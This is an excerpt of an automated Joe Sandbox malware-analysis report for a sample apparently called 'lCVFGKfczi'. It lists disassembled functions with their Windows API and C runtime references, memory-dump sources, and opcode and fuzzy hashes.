SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00DC6DC9), ref: 00DC7AB4

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 155cd4d7ba0ee6449a6c18fdf8b6468a82eb0c2d24fd00bee200f6a130d501dc
Instruction ID: f094ce2bb95d848d4de22c98f09c138db92b7f7e71aee4ebdd0bf00931188a4e
Opcode Fuzzy Hash: 155cd4d7ba0ee6449a6c18fdf8b6468a82eb0c2d24fd00bee200f6a130d501dc
Instruction Fuzzy Hash:

Function 00DC1D79 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 00DC1E9B

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: 43757a2dec2e3549f05c634746e33a9349a8c803c03793824e0d85c53d5ec343
Instruction ID: eaea22139d90cc79b9777b0248ef887b0e26ae9e7153da9860196ed558cc2897
Opcode Fuzzy Hash: 43757a2dec2e3549f05c634746e33a9349a8c803c03793824e0d85c53d5ec343
Instruction Fuzzy Hash: 44410D76D2053B4BCB4CEEB8C4555ABBB69DB46310B14427EED11DB3D2E234CA01C6E0

Function 00DDCC4B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00DDCC4B

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1bfbed19de534896c77bcac28a57058e97883d087929c677f62de6e0bf45f78e
Instruction ID: 4755c7aa703e8586982e28a006611ceb6777517faf77b827411316a2ac81a4f3
Opcode Fuzzy Hash: 1bfbed19de534896c77bcac28a57058e97883d087929c677f62de6e0bf45f78e
Instruction Fuzzy Hash: E0A012305003008F43008F36AA4D25836A5560158030480689000C5120D62456415F40

Function 00E19D26 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
Instruction ID: 7a1801e7757183c049a2ba30758c94bcbcfd0b09554ae4dd6c5ba8e66db3a953
Opcode Fuzzy Hash: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
Instruction Fuzzy Hash: 9D02B373E4B6F25B8F314EB944A02B67EB06E0275431F96A9DDC03F187C212DD4A96E0

Function 00E1AD13 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 20cca071e4b5eec4d526c3c385989e64cee485aec9b132b2cc9a6e2fa0d908cb
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 03C1B6B3E4B5F2058B36852D04182BFEE726E82B4931FD3B5DCD03F289C6266D8196D1

Function 00E1A92B Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: c9224ba65e095af6fcc1edc17683d2a41bf8ef912abd36c19c5c1d069650e642
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 20C16F73D4F5F2098B36852D08182BEEE726E92B4531FD3A5DCD03F28AC2266D8596D1

Function 00E1A559 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 335cd5d4267493d1c415e70678e78a63b3a4f5546b1a54781b686270044df6be
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 92C17073D4F5F2058B36852D08182BEEE726E92B4531FD3B5CCD03F28AC2266E8596D1

Function 00DDBB36 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 63958043b1502c816c5dfa838cdcc4df346477d89bcfdaf2bd9e67508add1089
Instruction ID: 62f76b5c18938632fcbc2903faf7bd5712988f0f19f32277a7baf9f280a51021
Opcode Fuzzy Hash: 63958043b1502c816c5dfa838cdcc4df346477d89bcfdaf2bd9e67508add1089
Instruction Fuzzy Hash: 86B1C3755007458BDB389F25CC92AB6B3A9FF4431CF19452FE98386780EB75E9858B30

Function 00E1A1BB Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 263eafd3f7e6fe57d9dcf04e56e0a5c684fd77f9be19734935f572dce25d2379
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 73B17173E4B5F2058B36852D04582BEEE726E92B4431FD3B5DCD03F28AC226AD85D6D1

Function 00E086FD Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction ID: 52c6a520a316de25eb5e37a932db88187fd53cbe3e652c2f3956ef52ec0261a7
Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction Fuzzy Hash: A721DD21670AE306CB854FF8FCC011267D1CBCD21F76ED279CE94C91A6D47DE6628590

Function 00DEE076 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
Instruction ID: b2060b4bb68e182e9c656f4ae656b0179fde7214c284f3a90ad00fd7c23de87f
Opcode Fuzzy Hash: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
Instruction Fuzzy Hash: 1C215FB5D0020A8FCB54DFA9D4816EEFBF4BB48320F54846ACA56F3350E634AA45CF94

Function 00DEE385 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: 0bad2ea208cbf96ef6d8d4aba50b352316f3b12938f2527417e53e0da8eed8a1
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: 36F08232900140EBCF11DF16D804EAAF7B9EB43361F253054E449B3200C330ED00EAB8

Function 00DDA64C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction ID: b7cee9ea7715125c2749a3f41284be7f8e3e241f121c92891ecf5f21aac9d688
Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction Fuzzy Hash: 3EE08C32921238EBCB14DB9CC90498AF3ECEB44B00B194497B501D3210C270DE00C7E0

Function 00E05582 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 00DC2003 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2972b38be2329f416addca4e19eb95bf4d48cf5cbabcaeda9ee0f16989914622
Instruction ID: 910dffb1161e2b370b2c3a4e945ee330026209258e345006e9725abcf26f2aa7
Opcode Fuzzy Hash: 2972b38be2329f416addca4e19eb95bf4d48cf5cbabcaeda9ee0f16989914622
Instruction Fuzzy Hash: F1D0923A6019109FC210CF09E480941F7B4FB996307164066E904A3720C334FC42CAD0

Function 00DD0F2E Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction ID: 28f5a0049cf8f4a49f2adafbabbd1c12532ecc68f55ddaeecc556ef76be351f7
Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction Fuzzy Hash: 97C08C34400A00C6CE398A2482713A4335DEBE2782FA804CEDC1A0B742C51EDC82DA31

Function 00DEE362 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 00DEE37A Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 00E0F54E Relevance: 54.3, APIs: 36, Instructions: 344
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

operator+.LIBCMT ref: 00E0F569

Part of subcall function 00E0C678: DName::DName.LIBCMT ref: 00E0C68B
Part of subcall function 00E0C678: DName::operator+.LIBCMT ref: 00E0C692

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction ID: 397d67e5b3b2eb9a033b2b6136596fe0702e9536c48e5e4a041af19d35d90c4c
Opcode Fuzzy Hash: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction Fuzzy Hash: D9D12D71900209AFDB14EFA8D895AEEBBF4BF08304F14516AE505F72D1EB349A85CB61

Function 00E10296 Relevance: 27.3, APIs: 18, Instructions: 274
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::getECSUDataType.LIBCMT ref: 00E10435
DName::operator=.LIBCMT ref: 00E104E3
DName::operator+=.LIBCMT ref: 00E1050E
DName::DName.LIBCMT ref: 00E10573
DName::operator+.LIBCMT ref: 00E1057A
DName::DName.LIBCMT ref: 00E1059D
DName::operator+.LIBCMT ref: 00E105A4
DName::operator+=.LIBCMT ref: 00E105B0
DName::operator=.LIBCMT ref: 00E105D7
DName::operator+=.LIBCMT ref: 00E105E9
UnDecorator::getPtrRefType.LIBCMT ref: 00E10612
operator+.LIBCMT ref: 00E10624

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
String ID:
API String ID: 1129569759-0
Opcode ID: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction ID: 769bf0475fedb9ec8ea4c64511b3e93fc088ccb15ab1ffc7cc7bb5a2b2cb0918
